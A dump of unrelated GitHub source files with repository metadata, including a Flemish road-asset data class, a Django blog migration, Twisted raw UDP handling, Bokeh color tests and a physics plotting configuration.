# Generated with OTLClassCreator. To modify: extend, do not edit
class Plantbakvorm(VegetatieElement, VlakGeometrie):
"""Beplanting die niet in volle grond werd aangebracht, maar in bakvorm."""
typeURI = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm'
"""De URI van het object volgens https://www.w3.org/2001/XMLSchema#anyURI."""
def __init__(self):
VegetatieElement.__init__(self)
VlakGeometrie.__init__(self)
self._isBereikbaar = OTLAttribuut(field=BooleanField,
naam='isBereikbaar',
label='is bereikbaar',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.isBereikbaar',
definition='Duidt aan of de plantbakvorm door de mens fysiek bereikbaar is zonder hulpmiddelen.',
owner=self)
self._isVerplaatsbaar = OTLAttribuut(field=BooleanField,
naam='isVerplaatsbaar',
label='is verplaatsbaar',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.isVerplaatsbaar',
definition='Duidt aan of de plantbakvorm al dan niet verplaatsbaar is en dus niet permanent verankerd werd met het aardoppervlak.',
owner=self)
self._oppervlakteBak = OTLAttribuut(field=KwantWrdInVierkanteMeter,
naam='oppervlakteBak',
label='oppervlakte',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.oppervlakteBak',
definition='De afmetingen van de plantbak in vierkante meter.',
owner=self)
self._volume = OTLAttribuut(field=KwantWrdInKubiekeMeter,
naam='volume',
label='volume',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.volume',
definition='De inhoud of grootte van de plantbakvorm in de ruimte in kubieke meter.',
owner=self)
@property
def isBereikbaar(self):
"""Duidt aan of de plantbakvorm door de mens fysiek bereikbaar is zonder hulpmiddelen."""
return self._isBereikbaar.get_waarde()
@isBereikbaar.setter
def isBereikbaar(self, value):
self._isBereikbaar.set_waarde(value, owner=self)
@property
def isVerplaatsbaar(self):
"""Duidt aan of de plantbakvorm al dan niet verplaatsbaar is en dus niet permanent verankerd werd met het aardoppervlak."""
return self._isVerplaatsbaar.get_waarde()
@isVerplaatsbaar.setter
def isVerplaatsbaar(self, value):
self._isVerplaatsbaar.set_waarde(value, owner=self)
@property
def oppervlakteBak(self):
"""De afmetingen van de plantbak in vierkante meter."""
return self._oppervlakteBak.get_waarde()
@oppervlakteBak.setter
def oppervlakteBak(self, value):
self._oppervlakteBak.set_waarde(value, owner=self)
@property
def volume(self):
"""De inhoud of grootte van de plantbakvorm in de ruimte in kubieke meter."""
return self._volume.get_waarde()
@volume.setter
def volume(self, value):
self._volume.set_waarde(value, owner=self)
|
[
"david.vlaminck@mow.vlaanderen.be"
] |
david.vlaminck@mow.vlaanderen.be
|
59b4c9db05c27c7724251e295febdd0179db742e
|
24fbe6b25338a58701a70fdda1aa81ef3add5fd3
|
/blog/migrations/0001_initial.py
|
a10a14be7a20c47db9e2eb1cb1f37151cd0ad50d
|
[] |
no_license
|
jattoabdul/jatto-portfolio
|
1d9001c90423114402119119baf325a287ad0c30
|
1e2d883f7da3c6f654a0796ec22750b52653e1c1
|
refs/heads/master
| 2021-01-13T07:19:52.932401
| 2016-10-21T07:46:28
| 2016-10-21T07:46:28
| 71,542,572
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,240
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-18 09:53
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Categories',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=50, unique=True)),
('slug', models.SlugField(unique=True)),
],
options={
'ordering': ['name'],
'verbose_name_plural': 'Categories',
},
),
migrations.CreateModel(
name='Posts',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=150, unique=True, verbose_name='Post Title')),
('slug', models.SlugField(max_length=150, unique=True, verbose_name='URL')),
('date', models.DateField(auto_now=True)),
('time', models.TimeField(auto_now=True)),
('posted', models.DateTimeField(auto_now_add=True, db_index=True)),
('meta_description', models.CharField(blank=True, max_length=500, verbose_name='Meta Description')),
('meta_keywords', models.CharField(blank=True, max_length=250, verbose_name='Meta Keywords')),
('body', models.TextField()),
('published', models.BooleanField(default=None)),
('author', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Categories')),
],
options={
'ordering': ['-date'],
'verbose_name_plural': 'Posts',
},
),
]
|
[
"jattoade@gmail.com"
] |
jattoade@gmail.com
|
45ce2c771a4665fdafa68a6b528d542323ae5b78
|
bdf86d69efc1c5b21950c316ddd078ad8a2f2ec0
|
/venv/Lib/site-packages/twisted/pair/rawudp.py
|
4a582b4475c57f6cd30f9db14c9c2a4319325960
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
DuaNoDo/PythonProject
|
543e153553c58e7174031b910fd6451399afcc81
|
2c5c8aa89dda4dec2ff4ca7171189788bf8b5f2c
|
refs/heads/master
| 2020-05-07T22:22:29.878944
| 2019-06-14T07:44:35
| 2019-06-14T07:44:35
| 180,941,166
| 1
| 1
| null | 2019-06-04T06:27:29
| 2019-04-12T06:05:42
|
Python
|
UTF-8
|
Python
| false
| false
| 1,814
|
py
|
# -*- test-case-name: twisted.pair.test.test_rawudp -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Implementation of raw packet interfaces for UDP
"""
import struct
from twisted.internet import protocol
from twisted.pair import raw
from zope.interface import implementer
class UDPHeader:
def __init__(self, data):
(self.source, self.dest, self.len, self.check) \
= struct.unpack("!HHHH", data[:8])
@implementer(raw.IRawDatagramProtocol)
class RawUDPProtocol(protocol.AbstractDatagramProtocol):
def __init__(self):
self.udpProtos = {}
def addProto(self, num, proto):
if not isinstance(proto, protocol.DatagramProtocol):
raise TypeError('Added protocol must be an instance of DatagramProtocol')
if num < 0:
raise TypeError('Added protocol must be positive or zero')
if num >= 2**16:
raise TypeError('Added protocol must fit in 16 bits')
if num not in self.udpProtos:
self.udpProtos[num] = []
self.udpProtos[num].append(proto)
def datagramReceived(self,
data,
partial,
source,
dest,
protocol,
version,
ihl,
tos,
tot_len,
fragment_id,
fragment_offset,
dont_fragment,
more_fragments,
ttl):
header = UDPHeader(data)
for proto in self.udpProtos.get(header.dest, ()):
proto.datagramReceived(data[8:],
(source, header.source))
|
[
"teadone@naver.com"
] |
teadone@naver.com
|
1a89de4b58df39f71a8cdaded521bd9bcc57ad82
|
ac1fdf53359b53e183fb9b2602328595b07cf427
|
/ParlAI/parlai/agents/transformer/ranker.py
|
51cefc77cb2f438fcd95c2cf84c00a8116b011bd
|
[] |
no_license
|
Ufukdogann/MasterThesis
|
780410c5df85b789136b525bce86ba0831409233
|
b09ede1e3c88c4ac3047800f5187c671eeda18be
|
refs/heads/main
| 2023-01-24T18:09:52.285718
| 2020-11-27T16:14:29
| 2020-11-27T16:14:29
| 312,416,173
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:f95aa8138972542126c3bcb4a212d2bf9ef9cda22d8b31711b727a63c523e699
size 335
|
[
"134679852Ufuk*"
] |
134679852Ufuk*
|
f7b744cfd5605b2aaf4cfa03f7cb316c383583ae
|
ed1e81a2325d310de7961274a06bfe6cdb7993d0
|
/basic-python/2.py
|
99f2e56af41d4bda165783ada2d9ac971743ca69
|
[] |
no_license
|
fahimkhan/python
|
ce573298adf30ca8426b74f3ab275ab7f8047a91
|
1733ad39cf214362c8a76f8996740715888d2101
|
refs/heads/master
| 2021-01-15T15:50:27.323739
| 2016-08-24T11:02:56
| 2016-08-24T11:02:56
| 20,254,607
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
#! /usr/bin/python
balance = int(raw_input('Enter balance'))
annualInterestRate = .2
payment = 0
TempBalance = balance
while TempBalance > 0:
payment += 10
TempBalance = balance
for month in range (1,13):
TempBalance = (TempBalance - payment) * (1+(annualInterestRate/12))
print(TempBalance)
if TempBalance <= 0:
print str('Lowest Payment: ' + str(round(payment,2)))
break
|
[
"fahim.elex@gmail.com"
] |
fahim.elex@gmail.com
|
bb32a4488d76e23dcf13ae34a46596167e8f81c9
|
57ea54e829f2fc8fcbea29fa8e2c9a6f64d88c3b
|
/promgen/checks.py
|
881c7e4f3d32d43f2118326d8a09357b6c6a6968
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
k8stech/promgen
|
4c959003f44be6c9bd207b81f440c090a5c2f47b
|
d189d27d37016b1861e3a0e4fb6186e5008bbcd9
|
refs/heads/master
| 2022-04-14T11:58:16.221164
| 2020-04-10T01:15:59
| 2020-04-10T01:15:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,697
|
py
|
import os
import pathlib
from django.conf import settings
from django.core import checks
from promgen import models, util
@checks.register(checks.Tags.models)
def sites(app_configs, **kwargs):
if models.Site.objects.count() == 0:
yield checks.Error(
"Site not configured", hint="Missing django site configuration"
)
for site in models.Site.objects.filter(
pk=settings.SITE_ID, domain__in=["example.com"]
):
yield checks.Error(
"Site not configured", obj=site, hint="Please update from admin panel"
)
@checks.register(checks.Tags.models)
def shards(**kwargs):
if models.Shard.objects.filter(enabled=True).count() == 0:
yield checks.Warning("Missing shards", hint="Ensure some shards are enabled")
if models.Shard.objects.filter(proxy=True).count() == 0:
yield checks.Warning("No proxy shards", hint="Ensure some shards are enabled")
@checks.register("settings")
def directories(**kwargs):
for key in ["prometheus:rules", "prometheus:blackbox", "prometheus:targets"]:
try:
path = pathlib.Path(util.setting(key)).parent
except TypeError:
yield checks.Warning("Missing setting for " + key)
else:
if not os.access(path, os.W_OK):
yield checks.Warning("Unable to write to %s" % path)
@checks.register("settings")
def promtool(**kwargs):
try:
path = pathlib.Path(util.setting("prometheus:promtool"))
except TypeError:
yield checks.Warning("Missing setting for " + key)
else:
if not os.access(path, os.X_OK):
yield checks.Warning("Unable to execute file %s" % path)
|
[
"paul.traylor@linecorp.com"
] |
paul.traylor@linecorp.com
|
c307af7dd424488f21d5c3a8b6b4ed0169334af5
|
0facb323be8a76bb4c168641309972fa77cbecf2
|
/Configurations/TTSemiLep/nanoAODv9/2016noHIPM/StackNew_comb/plot_noSig.py
|
b2fb463dd9727e75b4c7d86ab0fc9a9421d17a9f
|
[] |
no_license
|
bhoh/SNuAnalytics
|
ef0a1ba9fa0d682834672a831739dfcfa1e7486b
|
34d1fc062e212da152faa83be50561600819df0e
|
refs/heads/master
| 2023-07-06T03:23:45.343449
| 2023-06-26T12:18:28
| 2023-06-26T12:18:28
| 242,880,298
| 0
| 1
| null | 2020-02-25T01:17:50
| 2020-02-25T01:17:49
| null |
UTF-8
|
Python
| false
| false
| 8,986
|
py
|
import sys
from collections import OrderedDict
plot=OrderedDict()
dict_TColor={
'green':416+3,##darker greeen
'cyan':432,##bright blue
'magenta':616,##violet
'yellow':400,
'blue':600,
'orange':800+7,##darker orange
'pink':900,
'black':1,
'red':632,
'azure':860,##blue
'gray':920,
}
scriptname=opt.plotFile
if not 'ele' in scriptname:
groupPlot['QCD'] = {
'nameHR' : 'QCD',
'isSignal' : 0,
'color' : dict_TColor['gray'],
'isData' : 0,
'samples' : ['QCD_MU'],
}
if not 'mu' in scriptname:
groupPlot['QCD'] = {
'nameHR' : 'QCD',
'isSignal' : 0,
'color' : dict_TColor['gray'],
'isData' : 0,
'samples' : ['QCD_EM','QCD_bcToE'],
}
groupPlot['TTV'] = {
'nameHR' : 'TTV',
'isSignal' : 0,
'color' : dict_TColor['green'],
'isData' : 0,
'samples' : ['TTWjets','TTZjets'],
}
groupPlot['VV'] = {
'nameHR' : 'VV',
'isSignal' : 0,
'color' : dict_TColor['cyan'],
'isData' : 0,
'samples' : ['WW','WZ','ZZ'],
}
groupPlot['V+jets'] = {
'nameHR' : 'V+jets',
'isSignal' : 0,
'color' : dict_TColor['red'],
'isData' : 0,
'samples' : ['DY','Wjets'],
}
groupPlot['ST'] = {
'nameHR' : 'ST',
'isSignal' : 0,
'color' : dict_TColor['pink'],
'isData' : 0,
'samples' : ['ST'],
}
groupPlot['TT+jj'] = {
'nameHR' : 'TT+jj',
'isSignal' : 0,
'color': dict_TColor['orange'],
'isData' : 0,
'samples' : ['TTLJ_jj','TTLL_jj']
}
groupPlot['TT+bb'] = {
'nameHR' : 'TT+bb',
'isSignal' : 0,
'color': dict_TColor['blue'],
'isData' : 0,
'samples' : ['TTLJ_bb','TTLJ_bj','TTLL_bb','TTLL_bj']
}
groupPlot['TT+cc'] = {
'nameHR' : 'TT+cc',
'isSignal' : 0,
'color': dict_TColor['red']+4,
'isData' : 0,
'samples' : ['TTLJ_cc','TTLL_cc']
}
#for mass in ['075','080','085','090','100','110','120','130','140','150']:
for mass, color in [('090','green'),('120','red'),('150','blue')]:
sample_name = 'CHToCB_M{0}'.format(mass)
groupPlot[sample_name]={
'nameHR':'M{0}(BR=0.01)'.format(mass),
'scale' : 2*(0.01)*(1-0.01)*364.35,
'isData' : 0,
'isSignal' : 2,
'color':dict_TColor[color],
'samples' : [sample_name]
}
if not 'ele' in scriptname:
plot['QCD_MU'] = {
'nameHR' : 'QCD_MU',
'isSignal' : 0,
'color': dict_TColor['gray'],
'isData' : 0,
'samples' : ['QCD_MU']
}
if not 'mu' in scriptname:
plot['QCD_EM'] = {
'nameHR' : 'QCD_EM',
'isSignal' : 0,
'color': dict_TColor['gray'],
'isData' : 0,
'samples' : ['QCD_EM']
}
plot['QCD_bcToE'] = {
'nameHR' : 'QCD_bcToE',
'isSignal' : 0,
'color': dict_TColor['gray']+1,
'isData' : 0,
'samples' : ['QCD_bcToE']
}
plot['WW'] = {
'nameHR' : 'WW',
'isSignal' : 0,
'color': dict_TColor['cyan'],
'isData' : 0,
'samples' : ['WW']
}
plot['WZ'] = {
'nameHR' : 'WZ',
'isSignal' : 0,
'color': dict_TColor['cyan'],
'isData' : 0,
'samples' : ['WZ']
}
plot['ZZ'] = {
'nameHR' : 'ZZ',
'isSignal' : 0,
'color': dict_TColor['cyan'],
'isData' : 0,
'samples' : ['ZZ']
}
plot['DY'] = {
'nameHR' : 'DY',
'isSignal' : 0,
'color': dict_TColor['red'],
'isData' : 0,
'samples' : ['DY']
}
plot['Wjets'] = {
'nameHR' : 'Wjets',
'isSignal' : 0,
'color': dict_TColor['red'],
'isData' : 0,
'samples' : ['Wjets']
}
plot['ST'] = {
'nameHR' : 'ST',
'isSignal' : 0,
'color': dict_TColor['pink'],
'isData' : 0,
'samples' : ['ST']
}
#plot['TTLL'] = {
# 'nameHR' : 'TTLL',
# 'isSignal' : 0,
# 'color': dict_TColor['magenta'],
# 'isData' : 0,
# 'samples' : ['TTLL']
# }
plot['TTLJ_jj'] = {
'nameHR' : 'TTLJ+jj',
'isSignal' : 0,
'color': dict_TColor['orange'],
'isData' : 0,
'samples' : ['TTLJ_jj']
}
plot['TTLJ_cc'] = {
'nameHR' : 'TTLJ+cc',
'isSignal' : 0,
'color': dict_TColor['red']+4,
'isData' : 0,
'samples' : ['TTLJ_cc']
}
plot['TTLJ_bj'] = {
'nameHR' : 'TTLJ+bj',
'isSignal' : 0,
'color': dict_TColor['red']+1,
'isData' : 0,
'samples' : ['TTLJ_bj']
}
plot['TTLJ_bb'] = {
'nameHR' : 'TTLJ+bb',
'isSignal' : 0,
'color': dict_TColor['blue'],
'isData' : 0,
'samples' : ['TTLJ_bb']
}
plot['TTLL_jj'] = {
'nameHR' : 'TTLL+jj',
'isSignal' : 0,
'color': dict_TColor['orange'],
'isData' : 0,
'samples' : ['TTLL_jj']
}
plot['TTLL_cc'] = {
'nameHR' : 'TTLL+cc',
'isSignal' : 0,
'color': dict_TColor['red']+4,
'isData' : 0,
'samples' : ['TTLL_cc']
}
plot['TTLL_bj'] = {
'nameHR' : 'TTLL+bj',
'isSignal' : 0,
'color': dict_TColor['red']+1,
'isData' : 0,
'samples' : ['TTLL_bj']
}
plot['TTLL_bb'] = {
'nameHR' : 'TTLL+bb',
'isSignal' : 0,
'color': dict_TColor['blue'],
'isData' : 0,
'samples' : ['TTLL_bb']
}
plot['TTWjets'] = {
'nameHR' : 'TTWjets',
'isSignal' : 0,
'color': dict_TColor['green'],
'isData' : 0,
'samples' : ['TTWjets']
}
plot['TTZjets'] = {
'nameHR' : 'TTZjets',
'isSignal' : 0,
'color': dict_TColor['green'],
'isData' : 0,
'samples' : ['TTZjets']
}
plot['DATA'] = {
'nameHR' : 'DATA',
'isSignal' : 0,
'color': 1,
'isData' : 1 ,
'isBlind' : 0,
'samples' : ['DATA']
}
#for mass in ['075','080','085','090','100','110','120','130','140','150']:
#for mass, color in [('090','green'),('120','red'),('150','blue')]:
# sample_name = 'CHToCB_M{0}'.format(mass)
# plot[sample_name]={
# 'nameHR':'M{0}(BR=0.01)'.format(mass),
# 'scale' : 2*(0.01)*(1-0.01)*364.35,
# 'isData' : 0,
# 'isSignal' : 2,
# 'color':dict_TColor[color],
# 'samples' : [sample_name]
# }
#import sys
#sys.path.insert(0, "MassPoints")
#from List_MX import *
#from List_MX_VBF import *
#
#
##for MX in List_MX:
#for MX in [900]:
#
# plot['ggHWWlnuqq_M'+str(MX)]={
# 'nameHR':'ggHWWlnuqq_M'+str(MX),
# #'scale' : 100,
# 'isData' : 0,
# 'isSignal' : 1,
# 'color':dict_TColor['red'],
# 'samples' : ['ggHWWlnuqq_M'+str(MX)]
# }
#
##for MX in List_MX_VBF:
#for MX in [900]:
# plot['vbfHWWlnuqq_M'+str(MX)]={
# 'nameHR':'vbfHWWlnuqq_M'+str(MX),
# 'isData' : 0,
# 'isSignal' : 1,
# #'scale' : 100,
# 'color':dict_TColor['blue'],
# 'samples' : ['ggHWWlnuqq_M'+str(MX)]
# }
legend['lumi'] = 'L = 19.5/fb'
legend['sqrt'] = '#sqrt{s} = 13 TeV'
legend['extraText'] = 'work in progress'
|
[
"bh.oh@cern.ch"
] |
bh.oh@cern.ch
|
f4f472f18b95743fd61dc350b332932577e6dacc
|
b8eb666c8b6fe4610d87bff8048f4a95a1c5b549
|
/测试/UI自动化/测试工具__Appium/Project/bin/do.py
|
7bac86077f5a081ccaefee08dfceb4a5c78641a4
|
[] |
no_license
|
cainiaosun/study
|
1e983e404005e537410b205634a27cee974faba0
|
91df9b63cda1839b7fc60de3b5f1eb19ccc33a1f
|
refs/heads/master
| 2020-05-30T09:59:19.749099
| 2019-11-22T10:39:12
| 2019-11-22T10:39:12
| 189,641,828
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 46
|
py
|
class parent:
def sum(self,a,b):
return a+b
|
[
"1551577567@qq.com"
] |
1551577567@qq.com
|
c958cb5a82f6c8104bc7e0444032862e11459094
|
6b63f4fc5105f3190014e1dd5685a891a74f8c63
|
/0050_desafio.py
|
5be9a03b2c845818497d762946f24cd25bcae2ca
|
[] |
no_license
|
matheuszei/Python_DesafiosCursoemvideo
|
a711c7c9c6db022cc8a16a3a1dc59afabb586105
|
5b216908dd0845ba25ee6d2e6f8b3e9419c074d2
|
refs/heads/main
| 2023-05-10T18:13:09.785651
| 2021-06-04T13:50:48
| 2021-06-04T13:50:48
| 370,851,791
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
#Desenvolva um programa que leia seis números inteiros e mostre a soma apenas daqueles
# que forem pares. Se o valor digitado for ímpar, desconsidere-o.
soma = 0
for c in range(0, 6):
n = int(input('({}) Digite um valor: '.format(c)))
if n % 2 == 0:
soma += n
print('Soma total: {}'.format(soma))
|
[
"noreply@github.com"
] |
matheuszei.noreply@github.com
|
791915d263580e71b002e57d99955b163d92e7ef
|
bb53f1d84171b1c12d06c4729fc41942bcccfc84
|
/genesis/manage.py
|
46fc6b506b6a60ca89b9ee67150249a5ef101ce1
|
[] |
no_license
|
genesiscurso2020/genesisgit
|
ad1e6a5508291fca3e379837a211d29383e2fc1d
|
2b66b3ee73d3c6397e71a51b1e0f453557d0c1da
|
refs/heads/master
| 2023-04-04T20:10:28.919549
| 2021-04-06T17:42:07
| 2021-04-06T17:42:07
| 355,281,076
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'genesis.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"gjangoinminutes@gmail.com"
] |
gjangoinminutes@gmail.com
|
8d92e4c3a4b1b88ae82f1dff436289a50a3edeaa
|
83d657c787529f01a8ecc8a874421738a7eecec7
|
/Components/Decompose Corner and Cap Components.py
|
1dd679598592878764a5f6a5b69a03429fbcd0da
|
[
"Apache-2.0"
] |
permissive
|
BurgAndOeden/Glyphs-Scripts
|
e31b5164b491dfe0cd2d57f6cf1422c4aadda104
|
f0195d6b8f0a6c055e4e44d5ef41ba48bdd1e3a6
|
refs/heads/master
| 2020-09-16T08:01:06.345898
| 2019-11-24T00:15:44
| 2019-11-24T00:15:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,498
|
py
|
#MenuTitle: Decompose Corner and Cap Components
# -*- coding: utf-8 -*-
__doc__="""
Recreates the current paths without caps or components.
"""
from Foundation import NSClassFromString
thisFont = Glyphs.font # frontmost font
selectedLayers = thisFont.selectedLayers # active layers of selected glyphs
removeOverlapFilter = NSClassFromString("GlyphsFilterRemoveOverlap").alloc().init()
gridSize = float(thisFont.gridMain())/thisFont.gridSubDivision()
def removeCorners(thisLayer):
numOfHints = len(thisLayer.hints)
for i in range(numOfHints)[::-1]:
if thisLayer.hints[i].type == 16: # corner
thisLayer.removeObjectFromHintsAtIndex_(i)
def removeCaps(thisLayer):
numOfHints = len(thisLayer.hints)
for i in range(numOfHints)[::-1]:
if thisLayer.hints[i].type == 17: # cap
thisLayer.removeObjectFromHintsAtIndex_(i)
def process( thisLayer ):
pen = GSBezStringPen.alloc().init()
for thisPath in thisLayer.paths:
thisPath.drawInPen_(pen)
pathString = pen.charString()
newPaths = removeOverlapFilter.pathsFromBez_gridSize_(pathString,gridSize)
removeCaps(thisLayer)
removeCorners(thisLayer)
thisLayer.paths = newPaths
thisFont.disableUpdateInterface() # suppresses UI updates in Font View
for thisLayer in selectedLayers:
thisGlyph = thisLayer.parent
print "Processing", thisGlyph.name
thisGlyph.beginUndo() # begin undo grouping
process( thisLayer )
thisGlyph.endUndo() # end undo grouping
thisFont.enableUpdateInterface() # re-enables UI updates in Font View
|
[
"res@glyphsapp.com"
] |
res@glyphsapp.com
|
1d6318d6da52ddd15efa39e18f8a38efab9c2016
|
2729fff7cb053d2577985d38c8962043ee9f853d
|
/bokeh/colors/tests/test_rgb.py
|
38a92fcdc5718cea5c5cb924d3373c70544bb3a2
|
[
"BSD-3-Clause"
] |
permissive
|
modster/bokeh
|
2c78c5051fa9cac48c8c2ae7345eafc54b426fbd
|
60fce9003aaa618751c9b8a3133c95688073ea0b
|
refs/heads/master
| 2020-03-29T01:13:35.740491
| 2018-09-18T06:08:59
| 2018-09-18T06:08:59
| 149,377,781
| 1
| 0
|
BSD-3-Clause
| 2018-09-19T02:02:49
| 2018-09-19T02:02:49
| null |
UTF-8
|
Python
| false
| false
| 4,379
|
py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
from bokeh.colors import HSL
# Module under test
import bokeh.colors.rgb as bcr
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class Test_RGB(object):
def test_init(self):
c = bcr.RGB(10, 20, 30)
assert c
assert c.a == 1.0
assert c.r == 10
assert c.g == 20
assert c.b == 30
c = bcr.RGB(10, 20, 30, 0.3)
assert c
assert c.a == 0.3
assert c.r == 10
assert c.g == 20
assert c.b == 30
def test_repr(self):
c = bcr.RGB(10, 20, 30)
assert repr(c) == c.to_css()
c = bcr.RGB(10, 20, 30, 0.3)
assert repr(c) == c.to_css()
def test_copy(self):
c = bcr.RGB(10, 0.2, 0.3)
c2 = c.copy()
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
def test_from_hsl(self):
c = HSL(10, 0.1, 0.2)
c2 = bcr.RGB.from_hsl(c)
assert c2 is not c
assert c2.a == 1.0
assert c2.r == 56
assert c2.g == 48
assert c2.b == 46
c = HSL(10, 0.1, 0.2, 0.3)
c2 = bcr.RGB.from_hsl(c)
assert c2 is not c
assert c2.a == 0.3
assert c2.r == 56
assert c2.g == 48
assert c2.b == 46
def test_from_rgb(self):
c = bcr.RGB(10, 20, 30)
c2 = bcr.RGB.from_rgb(c)
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
c = bcr.RGB(10, 20, 30, 0.1)
c2 = bcr.RGB.from_rgb(c)
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
def test_to_css(self):
c = bcr.RGB(10, 20, 30)
assert c.to_css() == "rgb(10, 20, 30)"
c = bcr.RGB(10, 20, 30, 0.3)
assert c.to_css() == "rgba(10, 20, 30, 0.3)"
def test_to_hex(self):
c = bcr.RGB(10, 20, 30)
assert c.to_hex(), "#%02X%02X%02X" % (c.r, c.g, c.b)
def test_to_hsl(self):
c = bcr.RGB(255, 100, 0)
c2 = c.to_hsl()
assert c2 is not c
assert c2.a == c.a
assert c2.h == 24
assert c2.s == 1.0
assert c2.l == 0.5
c = bcr.RGB(255, 100, 0, 0.1)
c2 = c.to_hsl()
assert c2 is not c
assert c2.a == c.a
assert c2.h == 24
assert c2.s == 1.0
assert c2.l == 0.5
def test_to_rgb(self):
c = bcr.RGB(10, 20, 30)
c2 = c.to_rgb()
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
c = bcr.RGB(10, 20, 30, 0.1)
c2 = c.to_rgb()
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
|
[
"noreply@github.com"
] |
modster.noreply@github.com
|
aa247b139b389b58a5500dc4c769591494b5cef3
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-sblp-obt/sblp_ut=3.5_rd=0.5_rw=0.04_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=35/sched.py
|
a0392c19ab7309ecc424144631532e7acfb8ce71
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794
| 2021-04-25T03:27:16
| 2021-04-25T03:27:16
| 358,926,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 493
|
py
|
-S 2 -X RUN -Q 0 -L 1 73 250
-S 2 -X RUN -Q 0 -L 1 47 150
-S 2 -X RUN -Q 0 -L 1 39 150
-S 1 -X RUN -Q 1 -L 1 36 200
-S 1 -X RUN -Q 1 -L 1 34 150
-S 1 -X RUN -Q 1 -L 1 34 125
-S 0 -X RUN -Q 2 -L 1 32 200
-S 0 -X RUN -Q 2 -L 1 29 400
-S 0 -X RUN -Q 2 -L 1 28 125
-S 3 -X RUN -Q 3 -L 1 27 150
-S 3 -X RUN -Q 3 -L 1 27 250
-S 4 27 200
-S 5 25 300
-S 4 25 175
-S 4 21 150
-S 4 21 125
-S 4 17 125
-S 4 15 125
-S 4 13 125
-S 5 10 100
-S 5 10 125
|
[
"ricardo.btxr@gmail.com"
] |
ricardo.btxr@gmail.com
|
4d7083ee858b963ff2f612fec11bc7c74866bf28
|
f3b233e5053e28fa95c549017bd75a30456eb50c
|
/bace_input/L4M/4M-4K_MD_NVT_rerun/set_2.py
|
999213e504175ebbc8551697fbbec3b3df615cab
|
[] |
no_license
|
AnguseZhang/Input_TI
|
ddf2ed40ff1c0aa24eea3275b83d4d405b50b820
|
50ada0833890be9e261c967d00948f998313cb60
|
refs/heads/master
| 2021-05-25T15:02:38.858785
| 2020-02-18T16:57:04
| 2020-02-18T16:57:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 740
|
py
|
import os
dir = '/mnt/scratch/songlin3/run/bace/L4M/MD_NVT_rerun/ti_one-step/4M_4K/'
filesdir = dir + 'files/'
temp_prodin = filesdir + 'temp_prod_2.in'
temp_pbs = filesdir + 'temp_2.pbs'
